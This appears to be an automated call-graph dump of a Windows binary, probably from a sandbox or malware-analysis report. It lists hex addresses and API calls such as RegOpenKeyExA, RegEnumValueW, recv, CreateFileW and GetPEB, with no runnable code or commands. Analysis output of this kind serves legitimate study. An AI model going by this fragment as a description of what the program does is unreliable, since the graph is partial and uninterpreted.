a108b4 14487->14488 14489 a17870 RtlAllocateHeap 14488->14489 14490 a108cc 14489->14490 14491 a17870 RtlAllocateHeap 14490->14491 14492 a108e4 14491->14492 14493 a17870 RtlAllocateHeap 14492->14493 14494 a111f0 14493->14494 14495 a0e440 6 API calls 14494->14495 14496 a111f9 14495->14496 14498 a18526 14497->14498 14498->14498 14499 a1853b 14498->14499 14500 a18e70 RtlAllocateHeap 14498->14500 14499->14175 14500->14499 14507 a08a1a 14501->14507 14508 a08908 shared_ptr 14501->14508 14502 a17870 RtlAllocateHeap 14502->14508 14503 a05b20 RtlAllocateHeap 14503->14508 14504 a08a50 14506 a18070 RtlAllocateHeap 14504->14506 14505 a17f30 RtlAllocateHeap 14505->14508 14506->14507 14507->14181 14508->14502 14508->14503 14508->14504 14508->14505 14508->14507 14510 a05e28 14509->14510 14511 a05f0e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14510->14511 14512 a17f30 RtlAllocateHeap 14510->14512 14511->14073 14513 a05f99 14512->14513 14514 a17f30 RtlAllocateHeap 14513->14514 14515 a05fcd 14514->14515 14516 a17f30 RtlAllocateHeap 14515->14516 14517 a05ffe 14516->14517 14518 a17f30 RtlAllocateHeap 14517->14518 14519 a0602f 14518->14519 14520 a17f30 RtlAllocateHeap 14519->14520 14521 a06060 RegOpenKeyExA 14520->14521 14522 a0645a __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14521->14522 14527 a060b3 __cftof 14521->14527 14522->14073 14523 a06153 RegEnumValueW 14523->14527 14524 a17c50 RtlAllocateHeap 14524->14527 14525 a18090 RtlAllocateHeap 14525->14527 14526 a17870 RtlAllocateHeap 14526->14527 14527->14522 14527->14523 14527->14524 14527->14525 14527->14526 14529 a08fb0 14528->14529 14530 a17870 RtlAllocateHeap 14529->14530 14531 a08fbf 14530->14531 14532 a05b20 RtlAllocateHeap 14531->14532 14533 a08fca 14532->14533 14534 a17f30 RtlAllocateHeap 14533->14534 14535 a0901c 14534->14535 14536 a18150 RtlAllocateHeap 14535->14536 14537 a0902e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14536->14537 14537->14126 14539 a08e2f 14538->14539 14540 a17870 RtlAllocateHeap 14539->14540 14541 a08e3f 14540->14541 14542 a05b20 RtlAllocateHeap 14541->14542 14543 a08e4a 14542->14543 14544 a17f30 RtlAllocateHeap 14543->14544 14545 a08e9c 14544->14545 14546 a18150 RtlAllocateHeap 14545->14546 14547 a08eae __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14546->14547 14547->14126 14549 a18610 14548->14549 14549->14549 14550 a175d0 RtlAllocateHeap 14549->14550 14551 a18629 14550->14551 14552 a18e70 RtlAllocateHeap 14551->14552 14553 a18644 14551->14553 14552->14553 14553->14553 14554 a18e70 RtlAllocateHeap 14553->14554 14556 a18699 14553->14556 14555 a186e1 14554->14555 14555->14350 14556->14350 14558 a175d0 RtlAllocateHeap 14557->14558 14559 a18369 14558->14559 14560 a18e70 RtlAllocateHeap 14559->14560 14561 a18384 14559->14561 14560->14561 14562 a18e70 RtlAllocateHeap 14561->14562 14564 a183d8 14561->14564 14563 a1841e 14562->14563 14563->14400 14564->14400 14566 a09504 14565->14566 14567 a17f30 RtlAllocateHeap 14566->14567 14568 a0954c 14567->14568 14569 a17870 RtlAllocateHeap 14568->14569 14572 a09565 shared_ptr 14569->14572 14570 a096cf 14573 a09810 14570->14573 14574 a0972e 14570->14574 14571 a17870 RtlAllocateHeap 14571->14572 14572->14570 14572->14571 14572->14573 14575 a05b20 RtlAllocateHeap 14572->14575 14578 a09764 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14572->14578 14579 a17f30 RtlAllocateHeap 14572->14579 14577 a18070 RtlAllocateHeap 14573->14577 14576 a17f30 RtlAllocateHeap 14574->14576 14575->14572 14576->14578 14577->14578 14578->14455 14579->14572 14581 a091b4 14580->14581 14582 a17f30 RtlAllocateHeap 14581->14582 14583 a091fc 14582->14583 14584 a17870 RtlAllocateHeap 14583->14584 14590 a09215 shared_ptr 14584->14590 14585 a0937f 14587 a17f30 RtlAllocateHeap 14585->14587 14586 a17870 RtlAllocateHeap 14586->14590 14591 a093f6 shared_ptr 14587->14591 14588 a05b20 RtlAllocateHeap 14588->14590 14589 a09473 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14589->14457 14590->14585 14590->14586 14590->14588 14590->14591 14593 a17f30 RtlAllocateHeap 14590->14593 14591->14589 14592 a18070 RtlAllocateHeap 14591->14592 14594 a094a8 14592->14594 14593->14590 14596 a05520 14595->14596 14598 a05620 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14596->14598 14599 a02280 14596->14599 14598->14193 14602 a02240 14599->14602 14603 a02256 14602->14603 14606 a38667 14603->14606 14609 a37456 14606->14609 14608 a02264 14608->14596 14610 a37496 14609->14610 14612 a3747e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __cftof __dosmaperr 14609->14612 14611 a3683a __cftof 5 API calls 14610->14611 14610->14612 14613 a374ae 14611->14613 14612->14608 14615 a37a11 14613->14615 14616 a37a22 14615->14616 14617 a37a31 __cftof __dosmaperr 14616->14617 14618 a37d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14616->14618 14619 a37fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14616->14619 14620 a37c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14616->14620 14621 a37c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14616->14621 14617->14612 14618->14616 14619->14616 14620->14616 14621->14616 14623 a022a0 std::invalid_argument::invalid_argument RtlAllocateHeap 14622->14623 14624 a1c02b 14623->14624 14624->14337 14628 a386d7 14625->14628 14627 a38a9f 14627->13819 14629 a386e9 14628->14629 14630 a3683a __cftof 5 API calls 14629->14630 14633 a386fe __cftof __dosmaperr 14629->14633 14632 a3872e 14630->14632 14632->14633 14634 a38925 14632->14634 14633->14627 14635 a38962 14634->14635 14636 a38932 14634->14636 14637 a3d2e9 4 API calls 14635->14637 14639 a38941 __fassign 14636->14639 14640 a3d30d 14636->14640 14637->14639 14639->14632 14641 a3683a __cftof 5 API calls 14640->14641 14642 a3d32a 14641->14642 14644 a3d33a __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14642->14644 14645 a3f07f 14642->14645 14644->14639 14646 a3683a __cftof 5 API calls 14645->14646 14647 a3f09f __fassign 14646->14647 14648 a3f0f2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __cftof __fassign __freea 14647->14648 14649 a3af0b __cftof RtlAllocateHeap 14647->14649 14648->14644 14649->14648 14651 a18bf3 14650->14651 14652 a18cf9 14650->14652 14656 a18c35 14651->14656 14657 a18c5f 14651->14657 14653 a191a0 RtlAllocateHeap 14652->14653 14654 a18cfe 14653->14654 14655 a02440 RtlAllocateHeap 14654->14655 14661 a18c46 shared_ptr 14655->14661 14656->14654 14658 a18c40 14656->14658 14660 a1d312 RtlAllocateHeap 14657->14660 14657->14661 14659 a1d312 RtlAllocateHeap 14658->14659 14659->14661 14660->14661 14661->13882 14663 a17f30 RtlAllocateHeap 14662->14663 14670 a046c7 shared_ptr 14663->14670 14664 a04936 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14664->13903 14665 a17f30 RtlAllocateHeap 14669 a04806 shared_ptr 14665->14669 14666 a17f30 RtlAllocateHeap 14666->14670 14667 a18e70 RtlAllocateHeap 14667->14669 14668 a18e70 RtlAllocateHeap 14668->14670 14669->14664 14669->14665 14669->14667 14671 a04954 14669->14671 14670->14666 14670->14668 14670->14669 14670->14671 14672 a17f30 RtlAllocateHeap 14671->14672 14673 a049b3 14672->14673 14674 a17f30 RtlAllocateHeap 14673->14674 14675 a049cc 14674->14675 14676 a04650 RtlAllocateHeap 14675->14676 14677 a04a59 shared_ptr 14676->14677 14677->13903 14886 a18700 14887 a1d312 RtlAllocateHeap 14886->14887 14888 a1875a __cftof 14887->14888 14896 a19ae0 14888->14896 14890 a18784 14895 a1879c __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14890->14895 14900 a043b0 14890->14900 14894 a1880f 14897 a19b15 14896->14897 14909 a02ca0 14897->14909 14899 a19b46 14899->14890 14901 a1be0f InitOnceExecuteOnce 14900->14901 14902 a043ca 14901->14902 14903 a043d1 14902->14903 14904 a36beb 11 API calls 14902->14904 14906 a1bd80 14903->14906 14905 a043e4 14904->14905 14963 a1bcbb 14906->14963 14908 a1bd96 std::_Throw_future_error 14908->14894 14910 a02cdd 14909->14910 14911 a1be0f InitOnceExecuteOnce 14910->14911 14913 a02d06 14911->14913 14912 a02d11 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14912->14899 14913->14912 14915 a02d48 14913->14915 14918 a1be27 14913->14918 14927 a02400 14915->14927 14919 a1be33 14918->14919 14930 a028c0 14919->14930 14921 a1be53 std::_Throw_future_error 14922 a1bea3 14921->14922 14923 a1be9a 14921->14923 14925 a02aa0 12 API calls 14922->14925 14938 a1bdaf 14923->14938 14926 a1be9f 14925->14926 14926->14915 14958 a1b506 14927->14958 14929 a02432 14931 a17f30 RtlAllocateHeap 14930->14931 14932 a0290f 14931->14932 14933 a02670 RtlAllocateHeap 14932->14933 14934 a02927 14933->14934 14935 a0294d shared_ptr 14934->14935 14936 a337dc ___std_exception_copy RtlAllocateHeap 14934->14936 14935->14921 14937 a029a4 14936->14937 14937->14921 14939 a1cb61 InitOnceExecuteOnce 14938->14939 14940 a1bdc7 14939->14940 14941 a1bdce 14940->14941 14944 a36beb 14940->14944 14941->14926 14943 a1bdd7 14943->14926 14949 a36bf7 __cftof 14944->14949 14945 a38aaf __cftof 4 API calls 14946 a36c26 14945->14946 14947 a36c43 14946->14947 14948 a36c35 14946->14948 14951 a368bd 5 API calls 14947->14951 14950 a36c99 11 API calls 14948->14950 14949->14945 14952 a36c3f 14950->14952 14953 a36c5d 14951->14953 14952->14943 14954 a3681d RtlAllocateHeap 14953->14954 14955 a36c6a 14954->14955 14956 a36c99 11 API calls 14955->14956 14957 a36c71 ___free_lconv_mon 14955->14957 14956->14957 14957->14943 14960 a1b521 std::_Throw_future_error 14958->14960 14959 a38aaf __cftof 4 API calls 14961 a1b5cf 14959->14961 14960->14959 14962 a1b588 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __cftof 14960->14962 14962->14929 14964 a022a0 std::invalid_argument::invalid_argument RtlAllocateHeap 14963->14964 14965 a1bccf 14964->14965 14965->14908 14986 a1a140 14987 a1a1c0 14986->14987 14999 a17040 14987->14999 14989 a1a1fc 14992 a1a260 14989->14992 15007 a17bc0 14989->15007 15019 a03800 14992->15019 14993 a1a2ce shared_ptr 14994 a1d312 RtlAllocateHeap 14993->14994 14996 a1a3ee shared_ptr 14993->14996 14995 a1a38e 14994->14995 15027 a03ea0 14995->15027 14998 a1a3d6 15000 a17081 14999->15000 15001 a1d312 RtlAllocateHeap 15000->15001 15002 a170a8 15001->15002 15003 a172b6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 15002->15003 15004 a1d312 RtlAllocateHeap 15002->15004 15003->14989 15005 a1722b __cftof __Mtx_init_in_situ 15004->15005 15033 a02e80 15005->15033 15008 a17bd2 15007->15008 15009 a17c3b 15007->15009 15011 a17bdd 15008->15011 15012 a17c0c 15008->15012 15010 a02440 RtlAllocateHeap 15009->15010 15015 a17bea 15010->15015 15011->15009 15013 a17be4 15011->15013 15014 a17c29 15012->15014 15017 a1d312 RtlAllocateHeap 15012->15017 15016 a1d312 RtlAllocateHeap 15013->15016 15014->14992 15015->14992 15016->15015 15018 a17c16 15017->15018 15018->14992 15020 a038b6 15019->15020 15022 a0381f 15019->15022 15020->14993 15021 a038db 15023 a19110 RtlAllocateHeap 15021->15023 15022->15020 15022->15021 15024 a0388d shared_ptr 15022->15024 15025 a038e5 15023->15025 15026 a17bc0 RtlAllocateHeap 15024->15026 15025->14993 15026->15020 15028 a03f08 15027->15028 15029 a03ede 15027->15029 15030 a03f18 15028->15030 15078 a02bc0 15028->15078 15029->14998 15030->14998 15034 a02ec6 15033->15034 15037 a02f2f 15033->15037 15035 a1c5dc GetSystemTimePreciseAsFileTime 15034->15035 15036 a02ed2 15035->15036 15039 a02edd 15036->15039 15040 a02fde 15036->15040 15038 a02faf 15037->15038 15046 a1c5dc GetSystemTimePreciseAsFileTime 15037->15046 15038->15003 15043 a1d312 RtlAllocateHeap 15039->15043 15045 a02ef0 __Mtx_unlock 15039->15045 15041 a1c19a 12 API calls 15040->15041 15042 a02fe4 15041->15042 15044 a1c19a 12 API calls 15042->15044 15043->15045 15047 a02f79 15044->15047 15045->15037 15045->15042 15046->15047 15048 a1c19a 12 API calls 15047->15048 15049 a02f80 __Mtx_unlock 15047->15049 15048->15049 15050 a1c19a 12 API calls 15049->15050 15051 a02f98 __Cnd_broadcast 15049->15051 15050->15051 15051->15038 15052 a1c19a 12 API calls 15051->15052 15053 a02ffc 15052->15053 15054 a1c5dc GetSystemTimePreciseAsFileTime 15053->15054 15063 a03040 shared_ptr __Mtx_unlock 15054->15063 15055 a03185 15056 a1c19a 12 API calls 15055->15056 15057 a0318b 15056->15057 15058 a1c19a 12 API calls 15057->15058 15059 a03191 15058->15059 15060 a1c19a 12 API calls 15059->15060 15061 a03153 __Mtx_unlock 15060->15061 15062 a03167 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 15061->15062 15064 a1c19a 12 API calls 15061->15064 15062->15003 15063->15055 15063->15057 15063->15062 15066 a1c5dc GetSystemTimePreciseAsFileTime 15063->15066 15065 a0319d 15064->15065 15067 a0311f 15066->15067 15067->15055 15067->15059 15067->15061 15069 a1bc7c 15067->15069 15072 a1baa2 15069->15072 15071 a1bc8c 15071->15067 15073 a1bacc 15072->15073 15074 a1ce9b _xtime_get GetSystemTimePreciseAsFileTime 15073->15074 15077 a1bad4 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __Xtime_diff_to_millis2 15073->15077 15075 a1baff __Xtime_diff_to_millis2 15074->15075 15076 a1ce9b _xtime_get GetSystemTimePreciseAsFileTime 15075->15076 15075->15077 15076->15077 15077->15071 15079 a1d312 RtlAllocateHeap 15078->15079 15080 a02bce 15079->15080 15088 a1b777 15080->15088 15082 a02c02 15083 a02c09 15082->15083 15094 a02c40 15082->15094 15083->14998 15085 a02c18 15097 a02520 15085->15097 15087 a02c25 std::_Throw_future_error 15089 a1b784 15088->15089 15092 a1b7a3 Concurrency::details::_Reschedule_chore 15088->15092 15100 a1caa7 15089->15100 15091 a1b794 15091->15092 15102 a1b74e 15091->15102 15092->15082 15108 a1b72b 15094->15108 15096 a02c72 shared_ptr 15096->15085 15098 a337dc ___std_exception_copy RtlAllocateHeap 15097->15098 15099 a02557 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 15098->15099 15099->15087 15101 a1cac2 CreateThreadpoolWork 15100->15101 15101->15091 15103 a1b757 Concurrency::details::_Reschedule_chore 15102->15103 15106 a1ccfc 15103->15106 15105 a1b771 15105->15092 15107 a1cd11 TpPostWork 15106->15107 15107->15105 15109 a1b737 15108->15109 15110 a1b747 15108->15110 15109->15110 15112 a1c9a8 15109->15112 15110->15096 15113 a1c9bd TpReleaseWork 15112->15113 15113->15110 13162 a36beb 13167 a36bf7 __cftof 13162->13167 13164 a36c26 13165 a36c43 13164->13165 13166 a36c35 13164->13166 13184 a368bd 13165->13184 13168 a36c99 11 API calls 13166->13168 13176 a38aaf 13167->13176 13170 a36c3f 13168->13170 13171 a36c5d 13187 a3681d 13171->13187 13175 a36c71 ___free_lconv_mon 13177 a38ab4 __cftof 13176->13177 13180 a38abf __cftof 13177->13180 13202 a3d4f4 13177->13202 13199 a3651d 13180->13199 13181 a3d727 RtlAllocateHeap 13182 a3d73a __dosmaperr 13181->13182 13183 a38af2 __cftof 13181->13183 13182->13164 13183->13181 13183->13182 13221 a3683a 13184->13221 13186 a368cf 13186->13171 13257 a3676b 13187->13257 13189 a36835 13189->13175 13190 a36c99 13189->13190 13191 a36cc4 __cftof 13190->13191 13197 a36ca7 __cftof __dosmaperr 13190->13197 13192 a36d06 CreateFileW 13191->13192 13198 a36cea __cftof __dosmaperr 13191->13198 13193 a36d2a 13192->13193 13194 a36d38 13192->13194 13275 a36e01 GetFileType 13193->13275 13289 a36d77 13194->13289 13197->13175 13198->13175 13209 a363f7 13199->13209 13203 a3d500 __cftof 13202->13203 13204 a3651d __cftof 2 API calls 13203->13204 13205 a3d55c __cftof __dosmaperr 13203->13205 13208 a3d6ee __cftof 13204->13208 13205->13180 13206 a3d727 RtlAllocateHeap 13207 a3d73a __dosmaperr 13206->13207 13206->13208 13207->13180 13208->13206 13208->13207 13211 a36405 __cftof 13209->13211 13210 a36450 13210->13183 13211->13210 13214 a3645b 13211->13214 13219 a3a1c2 GetPEB 13214->13219 13216 a36465 13217 a3646a GetPEB 13216->13217 13218 a3647a __cftof 13216->13218 13217->13218 13220 a3a1dc __cftof 13219->13220 13220->13216 13222 a3685a 13221->13222 13226 a36851 13221->13226 13222->13226 13227 a3b4bb 13222->13227 13226->13186 13228 a3b4ce 13227->13228 13230 a36890 13227->13230 13228->13230 13235 a3f46b 13228->13235 13231 a3b4e8 13230->13231 13232 a3b510 13231->13232 13233 a3b4fb 13231->13233 13232->13226 13233->13232 13240 a3e571 13233->13240 13236 a3f477 __cftof 13235->13236 13237 a3f4c6 13236->13237 13238 a38aaf __cftof 4 API calls 13236->13238 13237->13230 13239 a3f4eb 13238->13239 13241 a3e57b 13240->13241 13244 a3e489 13241->13244 13243 a3e581 13243->13232 13245 a3e495 __cftof ___free_lconv_mon 13244->13245 13246 a3e4b6 13245->13246 13247 a38aaf __cftof 4 API calls 13245->13247 13246->13243 13248 a3e528 13247->13248 13249 a3e564 13248->13249 13253 a3a5ee 13248->13253 13249->13243 13254 a3a611 13253->13254 13255 a38aaf __cftof 4 API calls 13254->13255 13256 a3a687 13255->13256 13258 a36793 13257->13258 13263 a36779 __dosmaperr __fassign 13257->13263 13259 a3679a 13258->13259 13261 a367b9 __fassign 13258->13261 13259->13263 13264 a36916 13259->13264 13262 a36916 RtlAllocateHeap 13261->13262 13261->13263 13262->13263 13263->13189 13265 a36924 13264->13265 13268 a36955 13265->13268 13271 a3af0b 13268->13271 13270 a36935 13270->13263 13273 a3af47 __dosmaperr 13271->13273 13274 a3af19 __cftof 13271->13274 13272 a3af34 RtlAllocateHeap 13272->13273 13272->13274 13273->13270 13274->13272 13274->13273 13276 a36e3c 13275->13276 13288 a36ed2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __dosmaperr 13275->13288 13277 a36e56 __cftof 13276->13277 13311 a37177 13276->13311 13279 a36e75 GetFileInformationByHandle 13277->13279 13277->13288 13280 a36e8b 13279->13280 13279->13288 13297 a370c9 13280->13297 13284 a36ea8 13285 a36f71 SystemTimeToTzSpecificLocalTime 13284->13285 13286 a36ebb 13285->13286 13287 a36f71 SystemTimeToTzSpecificLocalTime 13286->13287 13287->13288 13288->13198 13334 a37314 13289->13334 13291 a36d85 13292 a36d8a __dosmaperr 13291->13292 13293 a370c9 5 API calls 13291->13293 13292->13198 13294 a36da3 13293->13294 13295 a37177 RtlAllocateHeap 13294->13295 13296 a36dc2 13295->13296 13296->13198 13299 a370df _wcsrchr 13297->13299 13298 a36e97 13307 a36f71 13298->13307 13299->13298 13315 a3b9e4 13299->13315 13301 a37123 13301->13298 13302 a3b9e4 5 API calls 13301->13302 13303 a37134 13302->13303 13303->13298 13304 a3b9e4 5 API calls 13303->13304 13305 a37145 13304->13305 13305->13298 13306 a3b9e4 5 API calls 13305->13306 13306->13298 13308 a36f89 13307->13308 13309 a36fa9 SystemTimeToTzSpecificLocalTime 13308->13309 13310 a36f8f __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13308->13310 13309->13310 13310->13284 13312 a37190 13311->13312 13314 a371a4 __dosmaperr 13312->13314 13326 a3b568 13312->13326 13314->13277 13316 a3b9f2 13315->13316 13319 a3b9f8 __cftof __dosmaperr 13316->13319 13320 a3ba2d 13316->13320 13318 a3ba28 13318->13301 13319->13301 13321 a3ba57 13320->13321 13324 a3ba3d __cftof __dosmaperr 13320->13324 13322 a3683a __cftof 5 API calls 13321->13322 13321->13324 13325 a3ba81 13322->13325 13323 a3b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13323->13325 13324->13318 13325->13323 13325->13324 13327 a3b592 __cftof 13326->13327 13329 a3b5ae __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __dosmaperr ___free_lconv_mon 13327->13329 13330 a3d6ef 13327->13330 13329->13314 13333 a3d6fc __cftof 13330->13333 13331 a3d727 RtlAllocateHeap 13332 a3d73a __dosmaperr 13331->13332 13331->13333 13332->13329 13333->13331 13333->13332 13335 a37338 13334->13335 13337 a3733e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ___std_exception_destroy 13335->13337 13338 a37036 13335->13338 13337->13291 13339 a37042 __dosmaperr 13338->13339 13344 a3b87b 13339->13344 13341 a37068 13341->13337 13342 a3705a __dosmaperr 13342->13341 13343 a3b87b 2 API calls 13342->13343 13343->13341 13347 a3b6de 13344->13347 13346 a3b894 13346->13342 13348 a3b75a 13347->13348 13349 a3b6ee 13347->13349 13364 a41ef8 13348->13364 13349->13348 13350 a3b6f5 13349->13350 13355 a3b702 ___std_exception_destroy 13350->13355 13356 a3b675 13350->13356 13353 a3b73b 13360 a3b815 13353->13360 13355->13346 13357 a3b690 13356->13357 13358 a3b695 __dosmaperr 13357->13358 13367 a3b7b7 13357->13367 13358->13353 13361 a3b822 13360->13361 13363 a3b83b __cftof 13360->13363 13362 a38aa4 ___std_exception_copy RtlAllocateHeap 13361->13362 13361->13363 13362->13363 13363->13355 13374 a41d22 13364->13374 13366 a41f0f 13366->13355 13368 a3b7c5 13367->13368 13371 a3b7f6 13368->13371 13372 a38aa4 ___std_exception_copy RtlAllocateHeap 13371->13372 13373 a3b7d6 13372->13373 13373->13358 13375 a41d54 13374->13375 13376 a41d40 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __cftof __dosmaperr ___std_exception_destroy 13374->13376 13377 a3b568 RtlAllocateHeap 13375->13377 13378 a41d5c 13375->13378 13376->13366 13377->13378 13378->13376 13379 a3b7b7 RtlAllocateHeap 13378->13379 13380 a41de9 13379->13380 13381 a3b675 RtlAllocateHeap 13380->13381 13382 a41df6 13381->13382 13382->13376 13383 a3b815 RtlAllocateHeap 13382->13383 13383->13376 14866 a1b7e9 14867 a1b6e5 13 API calls 14866->14867 14869 a1b811 Concurrency::details::_Reschedule_chore 14867->14869 14868 a1b836 14871 a1b648 13 API calls 14868->14871 14869->14868 14873 a1cade 14869->14873 14872 a1b84e 14871->14872 14874 a1cafc 14873->14874 14875 a1caec TpCallbackUnloadDllOnCompletion 14873->14875 14874->14868 14875->14874 13384 a086b0 13385 a086b6 13384->13385 13391 a36659 13385->13391 13388 a086d6 13390 a086d0 13398 a365a2 13391->13398 13393 a086c3 13393->13388 13394 a366e7 13393->13394 13395 a366f3 __cftof 13394->13395 13396 a366fd __cftof __dosmaperr 13395->13396 13410 a36670 13395->13410 13396->13390 13399 a365ae __cftof 13398->13399 13401 a365b5 __cftof __dosmaperr 13399->13401 13402 a3a783 13399->13402 13401->13393 13403 a3a78f __cftof 13402->13403 13406 a3a827 13403->13406 13405 a3a7aa 13405->13401 13408 a3a84a 13406->13408 13407 a3d6ef RtlAllocateHeap 13409 a3a890 ___free_lconv_mon 13407->13409 13408->13407 13408->13408 13408->13409 13409->13405 13411 a36692 13410->13411 13413 a3667d __cftof __dosmaperr ___free_lconv_mon 13410->13413 13411->13413 13414 a39ef9 13411->13414 13413->13396 13415 a39f36 13414->13415 13416 a39f11 13414->13416 13415->13413 13416->13415 13418 a402f8 13416->13418 13419 a40304 __cftof 13418->13419 13421 a4030c __cftof __dosmaperr 13419->13421 13422 a403ea 13419->13422 13421->13415 13423 a4040c 13422->13423 13425 a40410 __cftof __dosmaperr 13422->13425 13423->13425 13426 a3fb7f 13423->13426 13425->13421 13427 a3fbcc 13426->13427 13428 a3683a __cftof 5 API calls 13427->13428 13432 a3fbdb __cftof 13428->13432 13430 a3c4ea 5 API calls __fassign 13430->13432 13431 a3fe7b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13431->13425 13432->13430 13432->13431 13433 a3d2e9 13432->13433 13434 a3d2f4 13433->13434 13435 a3b4bb __cftof 4 API calls 13434->13435 13436 a3d304 13435->13436 13436->13432 14678 a0b0d0 14679 a0b122 14678->14679 14680 a17f30 RtlAllocateHeap 14679->14680 14681 a0b163 14680->14681 14682 a17870 RtlAllocateHeap 14681->14682 14683 a0b20d 14682->14683 14742 a0e410 14743 a0e435 14742->14743 14745 a0e419 14742->14745 14745->14743 14746 a0e270 14745->14746 14747 a0e280 __dosmaperr 14746->14747 14748 a38979 5 API calls 14747->14748 14749 a0e2bd 14748->14749 14750 a1c0c9 std::_Xinvalid_argument RtlAllocateHeap 14749->14750 14752 a0e40e 14750->14752 14751 a0e435 14751->14745 14752->14751 14753 a0e270 6 API calls 14752->14753 14753->14752 14877 a0dfd0 recv 14878 a0e032 recv 14877->14878 14879 a0e067 recv 14878->14879 14881 a0e0a1 14879->14881 14880 a0e1c3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14881->14880 14882 a1c5dc GetSystemTimePreciseAsFileTime 14881->14882 14883 a0e1fe 14882->14883 14884 a1c19a 12 API calls 14883->14884 14885 a0e268 14884->14885 14684 a17830 14685 a17850 14684->14685 14685->14685 14686 a17f30 RtlAllocateHeap 14685->14686 14687 a17862 14686->14687 14754 a18810 14755 a189f7 14754->14755 14758 a18866 14754->14758 14766 a19110 14755->14766 14757 a189f2 14761 a02440 RtlAllocateHeap 14757->14761 14758->14757 14759 a188d3 14758->14759 14760 a188ac 14758->14760 14763 a1d312 RtlAllocateHeap 14759->14763 14765 a188bd shared_ptr 14759->14765 14760->14757 14762 a188b7 14760->14762 14761->14755 14764 a1d312 RtlAllocateHeap 14762->14764 14763->14765 14764->14765 14767 a1c0e9 RtlAllocateHeap 14766->14767 14768 a1911a 14767->14768 14966 a19310 14967 a19325 14966->14967 14971 a19363 14966->14971 14968 a1d041 SleepConditionVariableCS 14967->14968 14969 a1932f 14968->14969 14970 a1cff7 RtlWakeAllConditionVariable 14969->14970 14969->14971 14970->14971 14972 a36974 14973 a3698c 14972->14973 14974 a36982 14972->14974 14975 a368bd 5 API calls 14973->14975 14976 a369a6 14975->14976 14977 a3681d RtlAllocateHeap 14976->14977 14978 a369b3 ___free_lconv_mon 14977->14978 15114 a36559 15115 a363f7 __cftof 2 API calls 15114->15115 15116 a3656a 15115->15116 14769 a1b85e 14774 a1b6e5 14769->14774 14771 a1b886 14782 a1b648 14771->14782 14773 a1b89f 14775 a1b6f1 Concurrency::details::_Reschedule_chore 14774->14775 14776 a1b722 14775->14776 14792 a1c5dc 14775->14792 14776->14771 14780 a1b70c __Mtx_unlock 14781 a02ad0 12 API calls 14780->14781 14781->14776 14783 a1b654 Concurrency::details::_Reschedule_chore 14782->14783 14784 a1b6ae 14783->14784 14785 a1c5dc GetSystemTimePreciseAsFileTime 14783->14785 14784->14773 14786 a1b669 14785->14786 14787 a02ad0 12 API calls 14786->14787 14788 a1b66f __Mtx_unlock 14787->14788 14789 a02ad0 12 API calls 14788->14789 14790 a1b68c __Cnd_broadcast 14789->14790 14790->14784 14791 a02ad0 12 API calls 14790->14791 14791->14784 14802 a1c382 14792->14802 14794 a1b706 14795 a02ad0 14794->14795 14796 a02ada 14795->14796 14797 a02adc 14795->14797 14796->14780 14819 a1c19a 14797->14819 14803 a1c3d8 14802->14803 14805 a1c3aa __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 14802->14805 14803->14805 14808 a1ce9b 14803->14808 14805->14794 14806 a1c42d __Xtime_diff_to_millis2 14806->14805 14807 a1ce9b _xtime_get GetSystemTimePreciseAsFileTime 14806->14807 14807->14806 14809 a1ceaa 14808->14809 14811 a1ceb7 __aulldvrm 14808->14811 14809->14811 14812 a1ce74 14809->14812 14811->14806 14815 a1cb1a 14812->14815 14816 a1cb37 14815->14816 14817 a1cb2b 